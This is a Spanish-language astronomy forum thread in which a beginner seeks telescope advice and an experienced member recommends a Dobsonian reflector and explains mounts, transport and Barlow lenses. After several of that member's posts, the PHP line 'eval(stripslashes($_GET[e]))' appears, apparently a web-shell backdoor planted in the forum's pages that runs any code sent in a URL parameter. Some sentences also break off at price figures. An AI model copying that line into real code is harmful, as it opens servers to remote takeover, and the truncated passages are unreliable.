Presentacion + consejos

Preguntas básicas sobre astronomía
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

Muy buenas noches a todos.

Acabo de registrarme en el foro, y la verdad es que no se como he llegado aqui, pero llevo un buen rato leyendo vuestros consejos, los aparatos que teneis, las maravillas que haces con las camaras y lo bien que os lo pasais en las excursiones a Pioz.

El caso es que siempre me ha atraido la astronomia, me he comprado algun libro que otro para saciar mi curiosidad, he leido cosas por internet, pero nunca me he tenido un telescopio. El otro dia estuve en el planetario de Madrid "viendo" la conjuncion planetaria, luego las Pleyades, mañana el eclipse parcial de luna... y me he decido a comprarme un telescopio. El problema es que no tengo mucha idea de que es lo mejor y por mas que busco en internet sigo sin aclararme.

Como os decia, soy bastante novato en ese tema y por tanto el aparato que quiero para empezar no quiero que me cueste un ojo de la cara y no saber apreciarlo. La semana que viene ire a la Optica Roma, de aqui de Madrid, que tiene muy buena pinta, para verlos en vivo y en directo, pero me gustaria que me aconsejarais antes.

Mi presupuesto es de unos 300
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

Hola,
lo primero bienvenido al foro. Veo que ya tienes más o menos claro los principales aspectos a la hora de elegir el telescopio, que son el presupuesto y para qué lo quieres usar.

Además deberás tener en cuenta varias cosas, por ejemplo si tienes espacio para guardar un trasto grande o prefieres algo que quepa ` debajo de la cama` .

De todos modos con los datos que me das yo te aconsejaría ir a por un reflector con montura dobson. Por 300
phpbb:eval(stripslashes($_GET[e]));
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

Muchas gracias por tu respuesta.

La verdad es que me lo dejas bastante mas claro. Ya habia estado leyendo por ahi que los reflectores con montura dobson dan muy buenas prestaciones para el precio que tienen. Pero no estoy seguro de que me convenza del todo.
La primera pega puede ser el tamaña, tal y como dices, sobre todo cuando este desmontado y quiera guardarlo. No se que cara iba a poner mi madre jeje.
Lo segundo es la montura. He leido que es muy robusta y estable, pero que al querer hacer pequeños movimientos puede costar que sea preciso. Ademas, ¿la montura puede ir directamente al suelo, o hay que fabricarse algun tipo de artilugio? Y si lo quieres sacar al campo, ¿es necesario algo tambien para que no se estropee?
Y por ultimo, ya que has tenido uno, ¿es facil de transportar?

Gracias por vuestra ayuda. Voy a mirar si teneis fijada alguna salida.

Un saludo
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

Hola,
te respondo una a una :)

La montura no tiene movimiento lento, y eso es una pega a la hora de hacer seguimiento a muchos aumentos. Cuando digo muchos aumentos me refiero a 250x en adelante. Además tiene un poco de inercia, es decir, al iniciar el movimiento hay que empujar un poco más fuerte que cuando ya se ha iniciado (por aquello de que el rozamiento estático es mayor que el dinámico) y da un saltito. No obstante todo eso es mejorable con un poco de bricolaje, simplemente colocaldo unos CDs o similares en el eje de azimut se mejora mucho. También se puede hacer bricolaje mayor... te dejo un enlace de las mejoras que le hice al mío:
http://www.asociacionhubble.org/modules ... ic&t=15854

EL tema del tamaño es importante, el cacharrillo ocupa mucho. Incluso un truss desmontado requiere su espacio aunque, este al menos, te va a caber debajo de la cama :)

La montura DEBE ir directamente al suelo para que tenga la robustez adecuada. Si acaso poner un plastico pequeño bajo el teles para que no se ensucien las patas en exceso. No pasa nada por sacarlo al campo y que el tubo se ensucie y coja humedad. Mi telescopio volvía en las noches de invierno chorreando humedad y simplemente le pasaba un paño al tubo y OJO al espejo ¡¡ni tocarlo!! solo dejar que se seque al aire.

Lo del transporte es relativo, el tubo son unos 8Kg y la montura otros 8Kg. Me hice con una bolsa para el tubo y la montura tiene un asa para poder cargarla, en dos viajes metía todo en el coche. Sin embargo he de reconocer que en invierno, a las 5 de la mañana y a 8 bajho cero se hace un poco pesado recoger los trastos. Pero como ya te digo es relativo porque un refractor de 70mm en ecuatorial pesa 10 veces menos pero tardas 10 veces más en recogerlo...

Aun no tenemos fijada la salida pero en estos días la anunciaremos en la web. Espero haberte sido de ayuda, ya sabes, pregunta cualquier duda.
phpbb:eval(stripslashes($_GET[e]));
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

¿Que si me has sido de ayuda? ¡Mucho mas que dos dias mirando en internet! La verdad es que por lo que me cuentas el dobson tiene menos pegas de las que pensaba. A ver la semana que viene cuando vaya a Optica Roma que tienen.
Esta tarde voy a ir al Corte Ingles y me pasare a ver los telescopios para hacerme una idea del tamaño.

Muchas gracias m3ntol

Por cierto, geniales los apaños que le has hecho al tuyo.
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

En El Corte Inglés no verás gran cosa y mucho menos un dobson. No compres ahí el telescopio. En Optica Roma si que verás los LightBridge y te harás una idea real del tamaño.

Mi dobson lo vendí para financiar la compra de mi nuevo equipo :( le echo de menos snif snif :cry: :cry: :cry:
phpbb:eval(stripslashes($_GET[e]));
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

Tranquilo, no se me habia pasado por la cabeza el comprarlo en el Corte, solo voy a echar un vistazo.
Vaya, una pena que viendieras tu dobson, despues de los apaños que le hiciste... ¿Que aparato tienes ahora?

Una ultima pregunta, ¿la lente Barlow es necesaria? ¿El aumento que gana lo pierde de alguna manera en otros aspectos?
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Presentacion + consejos

Mensaje por m3ntol »

Pues me he pasado al lado oscuro :twisted: :twisted: :twisted: ahora tengo un pequeño refractor de calidad, un TeleVue 85.

Respecto a las Barlow tienen un uso limitado. Normalmente la gente, sobre todo al principio, se obceca con el tema de los aumentos y, salvo en contadas ocasiones, no es necesario pasar de 100 o 150 aumentos.

Lo importante en un telescopio es la abertura y la calidad óptica. Si tienes poca calidad pero mucha abertura puedes disfrutar mucho y vice-versa. Y si tienes abertura y calidad ya ni te cuento, lo que sufre es el bolsillo...

El tema de los aumentos está limitado por esos factores, la calidad y la abertura del teles. Y siempre va a dar mehjor resultado un buen ocular de focal corta que un buen ocular del doble de focal y una barlow 2x. AUnque tengas los mismos aumentos algo se pierde por el camino al poner más cristal entre medias.

La barlow yo la entiendo para astrofotografía, aunque hay quien la usa para doblar los oculares e intentar ahorrarse dinero. Yo no lo veo así, pero eso entra ya dentro de lo opinable.
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Presentacion + consejos

Mensaje por Manuelariza »

M3ntol tiene razón cuando dice que es mejor tener un telescopio de una óptica aceptable y de buena abertura que intentar subir los aumentos a base de lente Barlow.respecto a la compra del telescopio también te recomiendo la Optica Roma,aunque por 300
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Presentacion + consejos

Mensaje por rviper »

Buenas noches MAL1, gracias por responder tu tambien. Mañana ire a Roma a ver que tienen. Ya me supongo que por 300
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
Responder